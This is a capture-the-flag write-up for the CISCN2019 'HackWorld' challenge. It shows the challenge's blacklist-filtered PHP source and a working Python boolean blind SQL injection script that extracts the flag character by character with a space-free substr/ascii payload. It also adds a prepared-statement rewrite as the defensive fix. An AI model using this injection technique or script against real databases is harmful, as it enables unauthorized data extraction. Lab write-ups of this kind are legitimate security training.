CISCN2019 North China Division Day2 - HackWorld

2020-6-19


Challenge source: buuctf

Open the challenge.


Together with the hint, this is clearly a SQL injection challenge, so start by testing for injection.

Entering a single letter returns bool(false); entering 1 returns "Hello, glzjin wants a girlfriend."; entering 2 returns "Do you want to be my girlfriend?"; any other number returns "Error Occured When Fetch Result."

From this we can guess it is boolean-based blind injection, and there is also a filter in place, which you could fuzz with Burp Suite. Here is the challenge's source code:

<?php
$dbuser='root';
$dbpass='root';

function safe($sql){
    # Blacklisted substrings; function names are essentially not filtered
    $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','insert','group','limit','update','delete','*','into','union','load_file','outfile','./');
    foreach($blackList as $blackitem){
        if(stripos($sql,$blackitem)){
            return False;
        }
    }
    return True;
}
if(isset($_POST['id'])){
    $id = $_POST['id'];
}else{
    die();
}
$db = mysql_connect("localhost",$dbuser,$dbpass);
if(!$db){
    die(mysql_error());
}
mysql_select_db("ctf",$db);

if(safe($id)){
    $query = mysql_query("SELECT content from passage WHERE id = ${id} limit 0,1");

    if($query){
        $result = mysql_fetch_array($query);

        if($result){
            echo $result['content'];
        }else{
            echo "Error Occured When Fetch Result.";
        }
    }else{
        var_dump($query);
    }
}else{
    die("SQL Injection Checked.");
}

As you can see, spaces and many other tokens are filtered, but plenty is left unfiltered.
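For comparison, here is how the same lookup would be written without a keyword blacklist at all. This is an added example, not the challenge's own code: it validates that id is a positive integer and binds it through a PDO prepared statement, so the input can never alter the query structure (the connection settings and credentials are placeholders).

```php
<?php
// Added example, not the challenge code: the same lookup done safely.
// Assumes a MySQL database "ctf" reachable over PDO; credentials are placeholders.
$pdo = new PDO('mysql:host=localhost;dbname=ctf;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepared statements
]);

if (!isset($_POST['id'])) {
    die();
}

// Allow-list the expected type (a positive integer) instead of blacklisting
// keywords: anything that is not a plain integer is rejected before it gets
// anywhere near the query, so there is no list of tokens to slip past.
$id = filter_var($_POST['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false) {
    http_response_code(400);
    die('Invalid id.');
}

// The SQL text is fixed at compile time; the value travels separately as a
// bound parameter and is never parsed as SQL, whatever it contains.
$stmt = $pdo->prepare('SELECT content FROM passage WHERE id = :id LIMIT 1');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$row = $stmt->fetch(PDO::FETCH_ASSOC);

if ($row) {
    echo htmlspecialchars($row['content'], ENT_QUOTES, 'UTF-8');
} else {
    // Same "not found" message as the original. Query failures now raise
    // exceptions to be logged server-side instead of being var_dump()ed back
    // to the client, which in the original gave away a bool(false) oracle.
    echo 'Error Occured When Fetch Result.';
}
```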

Since my own skills are limited, let's study the script written by more experienced players instead.

import requests
import sys
import string
import io

# Change the default encoding of standard output; otherwise s.text cannot be printed
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')

x = string.printable  # candidate characters for each position of the flag
flag = ""
url = "http://56039d8e-d2a3-4fc1-8195-3e18f2c1ea8c.node3.buuoj.cn/index.php"
payload = {
    "id": ""
}

# MySQL substr() positions are 1-based, so start at 1; up to 60 characters are tried
for i in range(1, 60):
    for j in x:
        # Boolean condition: when the guessed character is right the row with id 1
        # is returned and the response contains "Hello"
        payload["id"] = "1=(ascii(substr((select(flag)from(flag)),%s,1))=%s)=1" % (str(i), ord(j))
        s = requests.post(url, data=payload)
        # print(s.text)
        if "Hello" in s.text:
            flag += j
            print(flag)
            break

print(flag)

But this code threw an error when I ran it, so I removed sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')

After that it runs normally and produces the flag.